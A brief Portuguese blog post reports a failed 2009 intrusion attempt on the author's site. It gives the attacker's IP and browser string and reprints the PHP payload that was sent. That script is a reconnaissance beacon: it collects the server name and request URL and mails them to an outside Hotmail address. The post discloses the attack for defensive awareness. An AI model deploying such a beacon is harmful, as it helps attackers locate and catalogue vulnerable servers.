Hoje de manhã acordei com uma surpresa. Um e-mail automático enviado pelo Blog informando que as 09:26:37 estavam tentando invadir o site.
Se alguém conhece, ele usou:
Navegador: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
IP: 200.58.203.127
Data: 2009-06-16 09:26:37
Tentaram postar o seguinte código dentro do servidor.
<?
$data = date( "d/m/Y");
$hora = date ("H:i:s", time(void) );
$fstring = $_SERVER['PHP_SELF'];
$string = $_SERVER['QUERY_STRING'];
$servidor = $_SERVER['SERVER_NAME'];
$haua = ereg_replace('CMD', 'CMD', $string);
$todo = 'http://' . $servidor . $fstring . '?' . $haua;
$cod_todo = ($todo);
$cod_servidor = ($servidor);
$para1 = "n3g0ci4d0r@hotmail.com";
$para2 = "";
$assunto = "SERVIDOR: $cod_servidor";
$mensagem = "DATA: $data<br>";
$mensagem .= "HORA: $hora<br>";
$mensagem .= "SERVIDOR: $cod_servidor<br>";
$mensagem .= "URL: $cod_todo<br>";
$headers = "MIME-Version: 1.0";
$headers .= "Content-type: text/html; charset=iso-8859-1";
$headers .= "From: $cod_servidor <test@test.com>";
$mail = mail($para1, $assunto, $mensagem, $headers);
if ($mail==1) {
mail($para2, $assunto, $mensagem, $headers);
echo ('OK Email enviado');
} else {
echo('ERRO');
}
?>
Bom este foi mais uma tentativa frustrada de invasão.